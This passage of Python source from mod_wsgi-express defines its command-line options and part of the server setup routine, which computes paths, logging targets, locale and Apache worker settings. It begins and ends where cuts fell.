minimum rate for reading the request body which may be ' 'specified. Defaults to 0 indicating there is no maximum.') add_option('all', '--body-min-rate', type='int', default=500, metavar='BYTES', help='The number of bytes required to be sent ' 'as part of the request body to trigger a dynamic increase in ' 'the timeout on receiving the request body. Each time this ' 'number of bytes is received the timeout will be increased ' 'by 1 second up to any maximum specified by the maximum body ' 'timeout. Defaults to 500 bytes.') add_option('all', '--server-backlog', type='int', default=500, metavar='NUMBER', help='Depth of server socket listener ' 'backlog for Apache child processes. Defaults to 500.') add_option('unix', '--daemon-backlog', type='int', default=100, metavar='NUMBER', help='Depth of server socket listener ' 'backlog for daemon processes. Defaults to 100.') add_option('unix', '--send-buffer-size', type='int', default=0, metavar='NUMBER', help='Size of socket buffer for sending ' 'data to daemon processes. Defaults to 0, indicating ' 'the system default socket buffer size is used.') add_option('unix', '--receive-buffer-size', type='int', default=0, metavar='NUMBER', help='Size of socket buffer for receiving ' 'data from daemon processes. Defaults to 0, indicating ' 'the system default socket buffer size is used.') add_option('unix', '--header-buffer-size', type='int', default=0, metavar='NUMBER', help='Size of buffer used for reading ' 'response headers from daemon processes. Defaults to 0, ' 'indicating internal default of 32768 bytes is used.') add_option('unix', '--response-buffer-size', type='int', default=0, metavar='NUMBER', help='Maximum amount of response content ' 'that will be allowed to be buffered in the Apache child ' 'worker process when proxying the response from a daemon ' 'process. Defaults to 0, indicating internal default of ' '65536 bytes is used.') add_option('unix', '--response-socket-timeout', type='int', default=0, metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass before timing out on a write operation back to the ' 'HTTP client when the response buffer has filled and data is ' 'being forcibly flushed. Defaults to 0 seconds indicating that ' 'it will default to the value of the \'socket-timeout\' option.') add_option('all', '--enable-sendfile', action='store_true', default=False, help='Flag indicating whether sendfile() support ' 'should be enabled. Defaults to being disabled. This should ' 'only be enabled if the operating system kernel and file system ' 'type where files are hosted supports it.') add_option('unix', '--disable-reloading', action='store_true', default=False, help='Disables all reloading of daemon processes ' 'due to changes to the file containing the WSGI application ' 'entrypoint, or any other loaded source files. This has no ' 'effect when embedded mode is used as reloading is automatically ' 'disabled for embedded mode.') add_option('unix', '--reload-on-changes', action='store_true', default=False, help='Flag indicating whether worker processes ' 'should be automatically restarted when any Python code file ' 'loaded by the WSGI application has been modified. Defaults to ' 'being disabled. When reloading on any code changes is disabled, ' 'unless all reloading is also disabled, the worker processes ' 'will still though be reloaded if the file containing the WSGI ' 'application entrypoint is modified.') add_option('unix', '--user', default=default_run_user(), metavar='USERNAME', help='When being run by the root user, ' 'the user that the WSGI application should be run as.') add_option('unix', '--group', default=default_run_group(), metavar='GROUP', help='When being run by the root user, the ' 'group that the WSGI application should be run as.') add_option('all', '--callable-object', default='application', metavar='NAME', help='The name of the entry point for the WSGI ' 'application within the WSGI script file. Defaults to ' 'the name \'application\'.') add_option('all', '--map-head-to-get', default='Auto', metavar='OFF|ON|AUTO', help='Flag indicating whether HEAD ' 'requests should be mapped to a GET request. By default a HEAD ' 'request will be automatically mapped to a GET request when an ' 'Apache output filter is detected that may want to see the ' 'entire response in order to set up response headers correctly ' 'for a HEAD request. This can be disable by setting to \'Off\'.') add_option('all', '--document-root', metavar='DIRECTORY-PATH', help='The directory which should be used as the document root ' 'and which contains any static files.') add_option('all', '--directory-index', metavar='FILE-NAME', help='The name of a directory index resource to be found in the ' 'document root directory. Requests mapping to the directory ' 'will be mapped to this resource rather than being passed ' 'through to the WSGI application.') add_option('all', '--directory-listing', action='store_true', default=False, help='Flag indicating if directory listing ' 'should be enabled where static file application type is ' 'being used and no directory index file has been specified.') add_option('all', '--allow-override', metavar='DIRECTIVE-TYPE', action='append', help='Allow directives to be overridden from a ' '\'.htaccess\' file. Defaults to \'None\', indicating that any ' '\'.htaccess\' file will be ignored with override directives ' 'not being permitted.') add_option('all', '--mount-point', metavar='URL-PATH', default='/', help='The URL path at which the WSGI application will be ' 'mounted. Defaults to being mounted at the root URL of the ' 'site.') add_option('all', '--url-alias', action='append', nargs=2, dest='url_aliases', metavar='URL-PATH FILE-PATH|DIRECTORY-PATH', help='Map a single static file or a directory of static files ' 'to a sub URL.') add_option('all', '--error-document', action='append', nargs=2, dest='error_documents', metavar='STATUS URL-PATH', help='Map ' 'a specific sub URL as the handler for HTTP errors generated ' 'by the web server.') add_option('all', '--error-override', action='store_true', default=False, help='Flag indicating whether Apache error ' 'documents will override application error responses.') add_option('all', '--proxy-mount-point', action='append', nargs=2, dest='proxy_mount_points', metavar='URL-PATH URL', help='Map a sub URL such that any requests against it will be ' 'proxied to the specified URL. This is only for proxying to a ' 'site as a whole, or a sub site, not individual resources.') add_option('all', '--proxy-url-alias', action='append', nargs=2, dest='proxy_mount_points', metavar='URL-PATH URL', help=optparse.SUPPRESS_HELP) add_option('all', '--proxy-virtual-host', action='append', nargs=2, dest='proxy_virtual_hosts', metavar='HOSTNAME URL', help='Proxy any requests for the specified host name to the ' 'remote URL.') add_option('all', '--trust-proxy-header', action='append', default=[], dest='trusted_proxy_headers', metavar='HEADER-NAME', help='The name of any trusted HTTP header providing details ' 'of the front end client request when proxying.') add_option('all', '--trust-proxy', action='append', default=[], dest='trusted_proxies', metavar='IP-ADDRESS/SUBNET', help='The IP address or subnet corresponding to any trusted ' 'proxy.') add_option('all', '--keep-alive-timeout', type='int', default=2, metavar='SECONDS', help='The number of seconds which a client ' 'connection will be kept alive to allow subsequent requests ' 'to be made over the same connection when a keep alive ' 'connection is requested. Defaults to 2, indicating that keep ' 'alive connections are set for 2 seconds.') add_option('all', '--compress-responses', action='store_true', default=False, help='Flag indicating whether responses for ' 'common text based responses, such as plain text, HTML, XML, ' 'CSS and Javascript should be compressed.') add_option('all', '--server-metrics', action='store_true', default=False, help='Flag indicating whether internal server ' 'metrics will be available within the WSGI application. ' 'Defaults to being disabled.') add_option('all', '--server-status', action='store_true', default=False, help='Flag indicating whether web server status ' 'will be available at the /server-status sub URL. Defaults to ' 'being disabled.') add_option('all', '--host-access-script', metavar='SCRIPT-PATH', default=None, help='Specify a Python script file for ' 'performing host access checks.') add_option('all', '--auth-user-script', metavar='SCRIPT-PATH', default=None, help='Specify a Python script file for ' 'performing user authentication.') add_option('all', '--auth-type', metavar='TYPE', default='Basic', help='Specify the type of authentication ' 'scheme used when authenticating users. Defaults to using ' '\'Basic\'. Alternate schemes available are \'Digest\'.') add_option('all', '--auth-group-script', metavar='SCRIPT-PATH', default=None, help='Specify a Python script file for ' 'performing group based authorization in conjunction with ' 'a user authentication script.') add_option('all', '--auth-group', metavar='NAME', default='wsgi', help='Specify the group which users should ' 'be a member of when using a group based authorization script. ' 'Defaults to \'wsgi\' as a place holder but should be ' 'overridden to be the actual group you use rather than ' 'making your group name match the default.') add_option('all', '--include-file', action='append', dest='include_files', metavar='FILE-PATH', help='Specify the ' 'path to an additional web server configuration file to be ' 'included at the end of the generated web server configuration ' 'file.') add_option('all', '--rewrite-rules', metavar='FILE-PATH', help='Specify an alternate server configuration file which ' 'contains rewrite rules. Defaults to using the ' '\'rewrite.conf\' stored under the server root directory.') add_option('unix', '--envvars-script', metavar='FILE-PATH', help='Specify an alternate script file for user defined web ' 'server environment variables. Defaults to using the ' '\'envvars\' stored under the server root directory.') add_option('unix', '--lang', default=None, metavar='NAME', help=optparse.SUPPRESS_HELP) add_option('all', '--locale', default=None, metavar='NAME', help='Specify the natural language locale for the process ' 'as normally defined by the \'LC_ALL\' environment variable. ' 'If not specified, then the default locale for this process ' 'will be used. If the default locale is however \'C\' or ' '\'POSIX\' then an attempt will be made to use either the ' '\'en_US.UTF-8\' or \'C.UTF-8\' locales and if that is not ' 'possible only then fallback to the default locale of this ' 'process.') add_option('all', '--setenv', action='append', nargs=2, dest='setenv_variables', metavar='KEY VALUE', help='Specify ' 'a name/value pairs to be added to the per request WSGI environ ' 'dictionary') add_option('all', '--passenv', action='append', dest='passenv_variables', metavar='KEY', help='Specify the ' 'names of any process level environment variables which should ' 'be passed as a name/value pair in the per request WSGI ' 'environ dictionary.') add_option('all', '--working-directory', metavar='DIRECTORY-PATH', help='Specify the directory which should be used as the ' 'current working directory of the WSGI application. This ' 'directory will be searched when importing Python modules ' 'so long as the WSGI application doesn\'t subsequently ' 'change the current working directory. Defaults to the ' 'directory this script is run from.') add_option('all', '--pid-file', metavar='FILE-PATH', help='Specify an alternate file to be used to store the ' 'process ID for the root process of the web server.') add_option('all', '--server-root', metavar='DIRECTORY-PATH', help='Specify an alternate directory for where the generated ' 'web server configuration, startup files and logs will be ' 'stored. On Linux defaults to the sub directory specified by ' 'the TMPDIR environment variable, or /tmp if not specified. ' 'On macOS, defaults to the /var/tmp directory.') add_option('unix', '--server-mpm', action='append', dest='server_mpm_variables', metavar='NAME', help='Specify ' 'preferred MPM to use when using Apache 2.4 with dynamically ' 'loadable MPMs and more than one is available. By default ' 'the MPM precedence order when no preference is given is ' '\"event\", \"worker" and \"prefork\".') add_option('all', '--log-directory', metavar='DIRECTORY-PATH', help='Specify an alternate directory for where the log files ' 'will be stored. Defaults to the server root directory.') add_option('all', '--log-level', default='warn', metavar='NAME', help='Specify the log level for logging. Defaults to \'warn\'.') add_option('all', '--access-log', action='store_true', default=False, help='Flag indicating whether the web server access log ' 'should be enabled. Defaults to being disabled.') add_option('unix', '--startup-log', action='store_true', default=False, help='Flag indicating whether the web server startup log should ' 'be enabled. Defaults to being disabled.') add_option('all', '--verbose-debugging', action='store_true', dest='verbose_debugging', help=optparse.SUPPRESS_HELP) add_option('unix', '--log-to-terminal', action='store_true', default=False, help='Flag indicating whether logs should ' 'be directed back to the terminal. Defaults to being disabled. ' 'If --log-directory is set explicitly, it will override this ' 'option. If logging to the terminal is carried out, any ' 'rotating of log files will be disabled.') add_option('all', '--access-log-format', metavar='FORMAT', help='Specify the format of the access log records.'), add_option('all', '--error-log-format', metavar='FORMAT', help='Specify the format of the error log records.'), add_option('all', '--error-log-name', metavar='FILE-NAME', default='error_log', help='Specify the name of the error ' 'log file when it is being written to the log directory.'), add_option('all', '--access-log-name', metavar='FILE-NAME', default='access_log', help='Specify the name of the access ' 'log file when it is being written to the log directory.'), add_option('unix', '--startup-log-name', metavar='FILE-NAME', default='startup_log', help='Specify the name of the startup ' 'log file when it is being written to the log directory.'), add_option('unix', '--rotate-logs', action='store_true', default=False, help='Flag indicating whether log rotation should be performed.'), add_option('unix', '--max-log-size', default=5, type='int', metavar='MB', help='The maximum size in MB the log file should ' 'be allowed to reach before log file rotation is performed.'), add_option('unix', '--rotatelogs-executable', default=apxs_config.ROTATELOGS, metavar='FILE-PATH', help='Override the path to the rotatelogs executable.'), add_option('all', '--python-path', action='append', dest='python_paths', metavar='DIRECTORY-PATH', help='Specify ' 'the path to any additional directory that should be added to ' 'the Python module search path. Note that these directories will ' 'not be processed for \'.pth\' files. If processing of \'.pth\' ' 'files is required, set the \'PYTHONPATH\' environment variable ' 'in a script specified by the \'--envvars-script\' option.') add_option('all', '--python-eggs', metavar='DIRECTORY-PATH', help='Specify an alternate directory which should be used for ' 'unpacking of Python eggs. Defaults to a sub directory of ' 'the server root directory.') add_option('unix', '--shell-executable', default=SHELL, metavar='FILE-PATH', help='Override the path to the shell ' 'used in the \'apachectl\' script. The \'bash\' shell will ' 'be used if available.') add_option('unix', '--httpd-executable', default=apxs_config.HTTPD, metavar='FILE-PATH', help='Override the path to the Apache web ' 'server executable.') add_option('unix', '--process-name', metavar='NAME', help='Override ' 'the name given to the Apache parent process. This might be ' 'needed when a process manager expects the process to be named ' 'a certain way but due to a sequence of exec calls the name ' 'changed.') add_option('all', '--modules-directory', default=apxs_config.LIBEXECDIR, metavar='DIRECTORY-PATH', help='Override the path to the Apache ' 'web server modules directory.') add_option('unix', '--mime-types', default=find_mimetypes(), metavar='FILE-PATH', help='Override the path to the mime types ' 'file used by the web server.') add_option('unix', '--socket-prefix', metavar='DIRECTORY-PATH', help='Specify an alternate directory name prefix to be used ' 'for the UNIX domain sockets used by mod_wsgi to communicate ' 'between the Apache child processes and the daemon processes.') add_option('all', '--add-handler', action='append', nargs=2, dest='handler_scripts', metavar='EXTENSION SCRIPT-PATH', help='Specify a WSGI application to be used as a special ' 'handler for any resources matched from the document root ' 'directory with a specific extension type.') add_option('all', '--chunked-request', action='store_true', default=False, help='Flag indicating whether requests which ' 'use chunked transfer encoding will be accepted.') add_option('hidden', '--with-newrelic', action='store_true', default=False, help='Flag indicating whether all New Relic ' 'performance monitoring features should be enabled.') add_option('hidden', '--with-newrelic-agent', action='store_true', default=False, help='Flag indicating whether the New Relic ' 'Python agent should be enabled for reporting application server ' 'metrics.') add_option('hidden', '--with-newrelic-platform', action='store_true', default=False, help='Flag indicating whether the New Relic ' 'platform plugin should be enabled for reporting server level ' 'metrics.') add_option('hidden', '--newrelic-config-file', metavar='FILE-PATH', default='', help='Specify the location of the New Relic agent ' 'configuration file.') add_option('hidden', '--newrelic-environment', metavar='NAME', default='', help='Specify the name of the environment section ' 'that should be used from New Relic agent configuration file.') add_option('hidden', '--with-php5', action='store_true', default=False, help='Flag indicating whether PHP 5 support should be enabled. ' 'PHP code files must use the \'.php\' extension.') add_option('all', '--with-cgi', action='store_true', default=False, help='Flag indicating whether CGI script support should be ' 'enabled. CGI scripts must use the \'.cgi\' extension and be ' 'executable') add_option('unix', '--service-script', action='append', nargs=2, dest='service_scripts', metavar='SERVICE SCRIPT-PATH', help='Specify the name of a Python script to be loaded and ' 'executed in the context of a distinct daemon process. Used ' 'for running a managed service.') add_option('unix', '--service-user', action='append', nargs=2, dest='service_users', metavar='SERVICE USERNAME', help='When being run by the root user, the user that the ' 'distinct daemon process started to run the managed service ' 'should be run as.') add_option('unix', '--service-group', action='append', nargs=2, dest='service_groups', metavar='SERVICE GROUP', help='When being run by the root user, the group that the ' 'distinct daemon process started to run the managed service ' 'should be run as.') add_option('unix', '--service-log-file', action='append', nargs=2, dest='service_log_files', metavar='SERVICE FILE-NAME', help='Specify the name of a separate log file to be used for ' 'the managed service.') add_option('all', '--destroy-interpreter', action='store_true', default=False, help='Flag indicating whether the Python ' 'interpreter should be destroyed on process shutdown.') add_option('unix', '--embedded-mode', action='store_true', default=False, help='Flag indicating whether to run in embedded mode rather ' 'than the default daemon mode. Numerous daemon mode specific ' 'features will not operate when this mode is used.') add_option('all', '--enable-docs', action='store_true', default=False, help='Flag indicating whether the mod_wsgi documentation should ' 'be made available at the /__wsgi__/docs sub URL.') add_option('unix', '--debug-mode', action='store_true', default=False, help='Flag indicating whether to run in single process mode ' 'to allow the running of an interactive Python debugger. This ' 'will override all options related to processes, threads and ' 'communication with workers. All forms of source code reloading ' 'will also be disabled. Both stdin and stdout will be attached ' 'to the console to allow interaction with the Python debugger.') add_option('unix', '--enable-debugger', action='store_true', default=False, help='Flag indicating whether post mortem ' 'debugging of any exceptions which propagate out from the ' 'WSGI application when running in debug mode should be ' 'performed. Post mortem debugging is performed using the ' 'Python debugger (pdb).'), add_option('unix', '--debugger-startup', action='store_true', default=False, help='Flag indicating whether when post ' 'mortem debugging is enabled, that the debugger should ' 'also be thrown into the interactive console on initial ' 'startup of the server to allow breakpoints to be setup.'), add_option('unix', '--enable-coverage', action='store_true', default=False, help='Flag indicating whether coverage analysis ' 'is enabled when running in debug mode.') add_option('unix', '--coverage-directory', metavar='DIRECTORY-PATH', default='', help='Override the path to the directory into ' 'which coverage analysis will be generated when enabled under ' 'debug mode.') add_option('unix', '--enable-profiler', action='store_true', default=False, help='Flag indicating whether code profiling ' 'is enabled when running in debug mode.') add_option('unix', '--profiler-directory', metavar='DIRECTORY-PATH', default='', help='Override the path to the directory into ' 'which profiler data will be written when enabled under debug ' 'mode.') add_option('unix', '--enable-recorder', action='store_true', default=False, help='Flag indicating whether recording of ' 'requests is enabled when running in debug mode.') add_option('unix', '--recorder-directory', metavar='DIRECTORY-PATH', default='', help='Override the path to the directory into ' 'which recorder data will be written when enabled under debug ' 'mode.') add_option('unix', '--enable-gdb', action='store_true', default=False, help='Flag indicating whether Apache should ' 'be run under \'gdb\' when running in debug mode. This ' 'would be use to debug process crashes.') add_option('unix', '--gdb-executable', default='gdb', metavar='FILE-PATH', help='Override the path to the gdb ' 'executable.') add_option('unix', '--setup-only', action='store_true', default=False, help='Flag indicating that after the configuration files have ' 'been setup, that the command should then exit and not go on ' 'to actually run up the Apache server. This is to allow for ' 'the generation of the configuration with Apache then later ' 'being started separately using the generated \'apachectl\' ' 'script.') # add_option('unix', '--isatty', action='store_true', default=False, # help='Flag indicating whether should assume being run in an ' # 'interactive terminal session. In this case Apache will not ' # 'replace this wrapper script, but will be run as a sub process.' # 'Signals such as SIGINT, SIGTERM, SIGHUP and SIGUSR1 will be ' # 'forwarded onto Apache, but SIGWINCH will be blocked so that ' # 'resizing of a terminal session window will not cause Apache ' # 'to shutdown. This is a separate option at this time rather ' # 'than being determined automatically while the reliability of ' # 'intercepting and forwarding signals is verified.') def cmd_setup_server(params): formatter = optparse.IndentedHelpFormatter() formatter.set_long_opt_delimiter(' ') usage = '%prog setup-server script [options]' parser = optparse.OptionParser(usage=usage, option_list=option_list, formatter=formatter) (options, args) = parser.parse_args(params) _cmd_setup_server('setup-server', args, vars(options)) def _mpm_module_defines(modules_directory, preferred=None): if os.name == 'nt': return ['-DMOD_WSGI_MPM_ENABLE_WINNT_MODULE'] result = [] workers = ['event', 'worker', 'prefork'] found = False for name in workers: if not preferred or name in preferred: if os.path.exists(os.path.join(modules_directory, 'mod_mpm_%s.so' % name)): if not found: result.append('-DMOD_WSGI_MPM_ENABLE_%s_MODULE' % name.upper()) found = True result.append('-DMOD_WSGI_MPM_EXISTS_%s_MODULE' % name.upper()) return result def _cmd_setup_server(command, args, options): options['sys_argv'] = repr(sys.argv) options['mod_wsgi_so'] = where() options['working_directory'] = options['working_directory'] or os.getcwd() options['working_directory'] = os.path.abspath(options['working_directory']) if not options['host']: options['listener_host'] = None options['host'] = 'localhost' else: options['listener_host'] = options['host'] if os.name == 'nt': options['daemon_name'] = '(wsgi:%s:%s:%s)' % (options['host'], options['port'], getpass.getuser()) else: options['daemon_name'] = '(wsgi:%s:%s:%s)' % (options['host'], options['port'], os.getuid()) if not options['server_root']: if os.name == 'nt': tmpdir = tempfile.gettempdir() elif sys.platform == 'darwin': tmpdir = '/var/tmp' else: tmpdir = os.environ.get('TMPDIR') tmpdir = tmpdir or '/tmp' tmpdir = tmpdir.rstrip('/') if os.name == 'nt': options['server_root'] = ('%s/mod_wsgi-%s-%s-%s' % (tmpdir, options['host'], options['port'], getpass.getuser()) ).replace('\\','/') else: options['server_root'] = '%s/mod_wsgi-%s:%s:%s' % (tmpdir, options['host'], options['port'], os.getuid()) if not os.path.isdir(options['server_root']): os.mkdir(options['server_root']) if options['ssl_certificate_file']: options['ssl_certificate_file'] = os.path.abspath( options['ssl_certificate_file']) if options['ssl_certificate_key_file']: options['ssl_certificate_key_file'] = os.path.abspath( options['ssl_certificate_key_file']) if options['ssl_certificate']: options['ssl_certificate'] = os.path.abspath( options['ssl_certificate']) options['ssl_certificate_file'] = options['ssl_certificate'] options['ssl_certificate_file'] += '.crt' options['ssl_certificate_key_file'] = options['ssl_certificate'] options['ssl_certificate_key_file'] += '.key' if options['ssl_ca_certificate_file']: options['ssl_ca_certificate_file'] = os.path.abspath( options['ssl_ca_certificate_file']) if options['ssl_certificate_chain_file']: options['ssl_certificate_chain_file'] = os.path.abspath( options['ssl_certificate_chain_file']) if options['entry_point']: args = [options['entry_point']] if not args: if options['application_type'] != 'static': options['entry_point'] = posixpath.join( options['server_root'], 'default.wsgi') options['application_type'] = 'script' options['enable_docs'] = True else: if not options['document_root']: options['document_root'] = os.getcwd() options['entry_point'] = '(static)' else: if options['application_type'] in ('script', 'paste'): options['entry_point'] = posixpath.abspath(args[0]) elif options['application_type'] == 'static': if not options['document_root']: options['document_root'] = posixpath.abspath(args[0]) options['entry_point'] = 'ignored' else: options['entry_point'] = 'overridden' else: options['entry_point'] = args[0] if options['host_access_script']: options['host_access_script'] = posixpath.abspath( options['host_access_script']) if options['auth_user_script']: options['auth_user_script'] = posixpath.abspath( options['auth_user_script']) if options['auth_group_script']: options['auth_group_script'] = posixpath.abspath( options['auth_group_script']) options['documentation_directory'] = os.path.join(os.path.dirname( os.path.dirname(__file__)), 'docs') options['images_directory'] = os.path.join(os.path.dirname( os.path.dirname(__file__)), 'images') if os.path.exists(posixpath.join(options['documentation_directory'], 'index.html')): options['documentation_url'] = '/__wsgi__/docs/' else: options['documentation_url'] = 'http://www.modwsgi.org/' if not os.path.isabs(options['server_root']): options['server_root'] = posixpath.abspath(options['server_root']) if not options['document_root']: options['document_root'] = posixpath.join(options['server_root'], 'htdocs') try: os.mkdir(options['document_root']) except Exception: pass if not options['allow_override']: options['allow_override'] = 'None' else: options['allow_override'] = ' '.join(options['allow_override']) if not options['mount_point'].startswith('/'): options['mount_point'] = posixpath.normpath('/' + options['mount_point']) # Create subdirectories for mount points in document directory # so that fallback resource rewrite rule will work. if options['mount_point'] != '/': parts = options['mount_point'].rstrip('/').split('/')[1:] subdir = options['document_root'] try: for part in parts: subdir = posixpath.join(subdir, part) if not os.path.exists(subdir): os.mkdir(subdir) except Exception: raise if not os.path.isabs(options['document_root']): options['document_root'] = posixpath.abspath(options['document_root']) if not options['log_directory']: options['log_directory'] = options['server_root'] else: # The --log-directory option overrides --log-to-terminal. options['log_to_terminal'] = False if options['log_to_terminal']: # The --log-to-terminal option overrides --rotate-logs. options['rotate_logs'] = False try: os.mkdir(options['log_directory']) except Exception: pass if not os.path.isabs(options['log_directory']): options['log_directory'] = posixpath.abspath(options['log_directory']) if not options['log_to_terminal']: options['error_log_file'] = posixpath.join(options['log_directory'], options['error_log_name']) else: if os.name == 'nt': options['error_log_file'] = 'CON' else: try: with open('/dev/stderr', 'w'): pass except IOError: options['error_log_file'] = '|%s' % find_program( ['tee'], default='tee') else: options['error_log_file'] = '/dev/stderr' if not options['log_to_terminal']: options['access_log_file'] = posixpath.join( options['log_directory'], options['access_log_name']) else: try: with open('/dev/stdout', 'w'): pass except IOError: options['access_log_file'] = '|%s' % find_program( ['tee'], default='tee') else: options['access_log_file'] = '/dev/stdout' if options['access_log_format']: if options['access_log_format'] in ('common', 'combined'): options['log_format_nickname'] = options['access_log_format'] options['access_log_format'] = 'undefined' else: options['log_format_nickname'] = 'custom' else: options['log_format_nickname'] = 'common' options['access_log_format'] = 'undefined' options['access_log_format'] = options['access_log_format'].replace( '\"', '\\"') if options['error_log_format']: options['error_log_format'] = options['error_log_format'].replace( '\"', '\\"') options['pid_file'] = ((options['pid_file'] and posixpath.abspath( options['pid_file'])) or posixpath.join(options['server_root'], 'httpd.pid')) options['python_eggs'] = (posixpath.abspath(options['python_eggs']) if options['python_eggs'] is not None else None) if options['python_eggs'] is None: options['python_eggs'] = posixpath.join(options['server_root'], 'python-eggs') try: os.mkdir(options['python_eggs']) if os.name != 'nt' and os.getuid() == 0: import pwd import grp os.chown(options['python_eggs'], pwd.getpwnam(options['user']).pw_uid, grp.getgrnam(options['group']).gr_gid) except Exception: pass if options['python_paths'] is None: options['python_paths'] = [] if options['debug_mode'] or options['embedded_mode']: if options['working_directory'] not in options['python_paths']: options['python_paths'].insert(0, options['working_directory']) if options['debug_mode']: options['server_mpm_variables'] = ['worker', 'prefork'] elif options['embedded_mode']: if not options['server_mpm_variables']: options['server_mpm_variables'] = ['worker', 'prefork'] # Special case to check for when being executed from shiv variant # of a zipapp application bundle. We need to work out where the # site packages directory is and pass it with Python module search # path so is known about by the Apache sub process when executed. site_packages = [] if '_bootstrap' in sys.modules: bootstrap = sys.modules['_bootstrap'] if 'bootstrap' in dir(bootstrap): frame = inspect.currentframe() while frame is not None: code = frame.f_code if (code and code.co_filename == bootstrap.__file__ and code.co_name == 'bootstrap' and 'site_packages' in frame.f_locals): site_packages.append(str(frame.f_locals['site_packages'])) break frame = frame.f_back options['python_paths'].extend(site_packages) options['python_path'] = ':'.join(options['python_paths']) options['multiprocess'] = options['processes'] is not None options['processes'] = options['processes'] or 1 options['python_home'] = sys.prefix.replace('\\','/') options['keep_alive'] = options['keep_alive_timeout'] != 0 request_read_timeout = '' if options['header_timeout'] > 0: request_read_timeout += 'header=%d' % options['header_timeout'] if options['header_max_timeout'] > 0: request_read_timeout += '-%d' % options['header_max_timeout'] if options['header_min_rate'] > 0: request_read_timeout += ',MinRate=%d' % options['header_min_rate'] if options['body_timeout'] > 0: request_read_timeout += ' body=%d' % options['body_timeout'] if options['body_max_timeout'] > 0: request_read_timeout += '-%d' % options['body_max_timeout'] if options['body_min_rate'] > 0: request_read_timeout += ',MinRate=%d' % options['body_min_rate'] options['request_read_timeout'] = request_read_timeout if options['server_metrics']: options['server_metrics_flag'] = 'On' else: options['server_metrics_flag'] = 'Off' if options['handler_scripts']: handler_scripts = [] for extension, script in options['handler_scripts']: if not os.path.isabs(script): script = posixpath.abspath(script) handler_scripts.append((extension, script)) options['handler_scripts'] = handler_scripts if options['newrelic_config_file']: options['newrelic_config_file'] = posixpath.abspath( options['newrelic_config_file']) if options['with_newrelic']: options['with_newrelic_agent'] = True options['with_newrelic_platform'] = True if options['with_newrelic_platform']: options['server_metrics'] = True if options['service_scripts']: service_scripts = [] for name, script in options['service_scripts']: if not os.path.isabs(script): script = posixpath.abspath(script) service_scripts.append((name, script)) options['service_scripts'] = service_scripts # Node that all the below calculations are overridden if are using # embedded mode. max_clients = options['processes'] * options['threads'] if options['max_clients'] is not None: max_clients = max(options['max_clients'], max_clients) else: max_clients = 10 + max(10, int(1.5 * max_clients)) initial_workers = options['initial_workers'] min_spare_workers = options['minimum_spare_workers'] max_spare_workers = options['maximum_spare_workers'] if initial_workers is None: prefork_initial_workers = 0.05 else: prefork_initial_workers = initial_workers if min_spare_workers is None: prefork_min_spare_workers = prefork_initial_workers else: prefork_min_spare_workers = min_spare_workers if max_spare_workers is None: prefork_max_spare_workers = 0.1 else: prefork_max_spare_workers = max_spare_workers options['prefork_max_clients'] = max_clients options['prefork_server_limit'] = max_clients options['prefork_start_servers'] = max(1, int( prefork_initial_workers * max_clients)) options['prefork_min_spare_servers'] = max(1, int( prefork_min_spare_workers * max_clients)) options['prefork_max_spare_servers'] = max(1, int( prefork_max_spare_workers * max_clients)) if initial_workers is None: worker_initial_workers = 0.2 else: worker_initial_workers = initial_workers if min_spare_workers is None: worker_min_spare_workers = worker_initial_workers else: worker_min_spare_workers = min_spare_workers if max_spare_workers is None: worker_max_spare_workers = 0.6 else: worker_max_spare_workers = max_spare_workers options['worker_max_clients'] = max_clients if max_clients > 20: options['worker_threads_per_child'] = int(max_clients / (int(max_clients / 20) + 1)) else: options['worker_threads_per_child'] = 10 options['worker_thread_limit'] = options['worker_threads_per_child'] count = max_clients / options['worker_threads_per_child'] options['worker_server_limit'] = int(math.floor(count)) if options['worker_server_limit'] != count: options['worker_server_limit'] += 1 options['worker_max_clients'] = (options['worker_server_limit'] * options['worker_threads_per_child']) options['worker_start_servers'] = max(1, int(worker_initial_workers * options['worker_server_limit'])) options['worker_min_spare_threads'] = max( options['worker_threads_per_child'], int(worker_min_spare_workers * options['worker_server_limit']) * options['worker_threads_per_child']) options['worker_max_spare_threads'] = max( options['worker_threads_per_child'], int(worker_max_spare_workers * options['worker_server_limit']) * options['worker_threads_per_child']) if options['embedded_mode']: max_clients = options['processes'] * options['threads'] options['prefork_max_clients'] = max_clients options['prefork_server_limit'] = max_clients options['prefork_start_servers'] = max_clients options['prefork_min_spare_servers'] = max_clients options['prefork_max_spare_servers'] = max_clients options['worker_max_clients'] = max_clients options['worker_server_limit'] = options['processes'] options['worker_thread_limit'] = options['threads'] options['worker_threads_per_child'] = options['threads'] options['worker_start_servers'] = options['processes'] options['worker_min_spare_threads'] = max_clients options['worker_max_spare_threads'] = max_clients options['httpd_conf'] = posixpath.join(options['server_root'], 'httpd.conf') options['httpd_executable'] = os.environ.get('HTTPD', options['httpd_executable']) if os.name != 'nt': if not os.path.isabs(options['httpd_executable']): options['httpd_executable'] = find_program( [options['httpd_executable']], 'httpd', ['/usr/sbin']) if not options['process_name']: options['process_name'] = posixpath.basename( options['httpd_executable']) + ' (mod_wsgi-express)' options['process_name'] = options['process_name'].ljust( len(options['daemon_name'])) options['rewrite_rules'] = (posixpath.abspath( options['rewrite_rules']) if options['rewrite_rules'] is not None else None) options['envvars_script'] = (posixpath.abspath( options['envvars_script']) if options['envvars_script'] is not None else None) if options['locale'] is None: options['locale'] = options['lang'] if options['locale'] is None: language, encoding = locale.getdefaultlocale() if language is None: language = 'C' if encoding is None: options['locale'] = locale.normalize(language) else: options['locale'] = locale.normalize(language + '.' + encoding) if options['locale'].upper() in ('C', 'POSIX'): oldlocale = locale.setlocale(locale.LC_ALL) try: locale.setlocale(locale.LC_ALL, 'en_US.UTF-8') options['locale'] = 'en_US.UTF-8' except locale.Error: try: locale.setlocale(locale.LC_ALL, 'C.UTF-8') options['locale'] = 'C.UTF-8' except locale.Error: pass locale.setlocale(locale.LC_ALL, oldlocale) options['lang'] = options['locale'] options['httpd_arguments_list'] = [] options['trusted_proxy_headers'] = ' '.join( options['trusted_proxy_headers']) options['trusted_proxies'] = ' '.join(options['trusted_proxies']) if options['startup_log']: if not options['log_to_terminal']: options['startup_log_file'] = posixpath.join( options['log_directory'], options['startup_log_name']) else: if os.name == 'nt': options['startup_log_file'] = 'CON' else: try: with open('/dev/stderr', 'w'): pass except IOError: try: with open('/dev/tty', 'w'): pass except IOError: options['startup_log_file'] = None else: options['startup_log_file'] = '/dev/tty' else: options['startup_log_file'] = '/dev/stderr' if options['startup_log_file']: options['httpd_arguments_list'].append('-E') options['httpd_arguments_list'].append(options['startup_log_file']) if options['verbose_debugging']: options['verbose_debugging_flag'] = 'On' else: 